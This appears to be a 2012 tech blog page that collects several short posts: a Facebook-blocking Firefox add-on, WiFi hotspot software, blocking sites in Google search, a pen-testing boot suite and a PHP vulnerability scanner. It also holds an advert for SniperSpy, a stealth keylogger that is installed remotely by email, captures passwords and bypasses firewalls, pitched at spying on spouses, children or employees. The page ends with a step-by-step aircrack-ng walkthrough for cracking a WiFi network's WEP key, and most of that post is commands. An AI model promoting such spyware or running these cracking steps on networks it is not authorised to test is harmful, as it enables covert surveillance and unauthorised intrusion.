Saturday 28 January 2012

Facebook Blocker Add-on [Firefox]

FB_thumb
Earlier we told you about Facebook tracking our every moment. Not only when we are browsing Facebook, but also when we surf other sites having Facebook widgets like the like or recommended buttons, etc. So Facebook Blocker is a tiny Add-on for Firefox that blocks the flow of information from third-party sites to Facebook, but still lets you use Facebook itself and even its social widgets.

You just have to install the add-on and after that it will take care of the rest. When installed the information will only be sent when you like or recommend or use any of its social networking widgets and not on page loads . So now you can enjoy Facebook without giving your browsing information.


Free Download 2hotspot controller beta4 (WiFi Tool)




2hotspot is a service that enables you to create wireless hotspots for different purposes:
1.   Community Wireless Networks – Are hotspots that offer community services such as chat, bulletin board, forums and blogs that are unique to a location or set of locations. Community Hotspots are popular at public libraries, community centers, and residential neighborhoods. Community Hotspots can include Internet sharing, and can be added to any of the following hotspot types. These type of Hotspots are unique because they can offer content that is distinctive to users who are physically located at a community location.

2.   Free Internet Hotspots – Are hotspots that provide free access to the Internet. 
2hotspot requires users to register before they gain free access. 2hotspot can also limit the number of concurrent users allowed and the bandwidth allocated to these users.

3.   Broadband Internet Sharing  Are hotspots that allow users to share a single Internet connection and split the ISP bill. 

2hotspot automatically calculates the portion each user need to pay. 
2hotspot users can reduce their broadband fees this way, or upgrade to higher speed broadband connection while keeping costs low.

4.   For Profit Hotspot– Are hotspots that enables subscribers or casual users to access the Internet for a fee
2hotspot manages the payment collection according to billing plans you define.2hotspot mail you checks for the payments made in your hotspots.

Tip:    Since 2hotspot software can run on any PC, your laptop is potentially a portable hotspot.

Note: Some ISPs may not allow you to share your Internet connection. It is your responsibility to review your service agreement with your ISP, to determine whether Internet sharing is restricted or not. 


5.   Large Scale Commercial Hotspots, Wireless ISPs –
 Are hotspots that are operated by professional hotspot companies that typically manage multiple locations, big and busy locations, and a larger subscriber base.
2hotspot has advanced centralized management features, full control over hotspot branding, and use of your own merchant account.


download

[How To] Block a website on Google Search result


[How To] Block a website on Google Search result
Using Google feature you can block a website in Google search result. After Blocking a Website Google will not display the content of the blocked websites in search result.
This feature will help you when you don’t want to see the content of specific website.
In order to block a Website in Google search results, follow the steps written below:
Steps for blocking a website in Google search result:
1. Firstly login to your Gmail account.

2. After, logging in go to http://google.com

3. Now, Expand “Setting” button present on the right top corner.
Block a website in search result
Setting for Google search
4. Click on “Search Settings”.

5. A new page displays showing you the settings for your search result.
Setting for Google search
Settings for Google search

6. On “Blocking unwanted results” caption click on “Block unwanted sites” link.

7. A webpage displays asking you the address of a website which you want to block.
block a website on google search result
Block a website on Google search result
8. Insert the address of a website and click on “Block Site”.
This is how we can block a website in Google search result. The content of website which you have blocked will never display on your search result. If you want to include the website in your search result then remove it from your blocked list.

Katana: Portable Multi-Boot Security Suite


Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.
 Katana Tool Kit:
    Katana: Portable Multi Boot Security Suite
  •  Metasploit
  • Wireshark
  • NMAP
  • John the Ripper
  • Cain & Abel
  • Firefox
  • PuTTY
  • the Unstoppable Copier
  • OllyDBG
  • Cygwin
  • ClamAV
  • IECookiesView
  • MozillaCacheView
  • FreeOTFE
  • FindSSN
  • The Sleuth Kit
  • OpenOffice

How to Detect Vulnerability in PHP Application


PHP Vulnerability Hunter is a PHP fuzzing tool that scans for several different vulnerabilities by performing dynamic program analysis. It can detect arbitrary command execution, local file inclusion, arbitrary upload, and several other types of vulnerabilities.

Remote Password Hacking Software – SniperSpy


hack computer
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes

Sniper Spy Cheating Spouse Keylogger
4. Records any Password (Email, Login, Instant Messenger etc.)
Remote Password Hacking Software
hack computer
5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to log off the current Windows user
9. Completely Bypasses any Firewall
What if I don’t have physical access to victims computer?
Remote Password Hacking Software
No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.
This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.
The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.
Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can’t get to your computer and are worried about the Internet safety or habits of those using it, then you NEEDSniperSpy

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).
So don’t wait waste your time searching for a hacking tool that won’t work.

CLICK HERE & TRY SNIPER SPY NOW!

:)

CRACK WIFI – Simple WEP Crack


Crack WiFi

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done!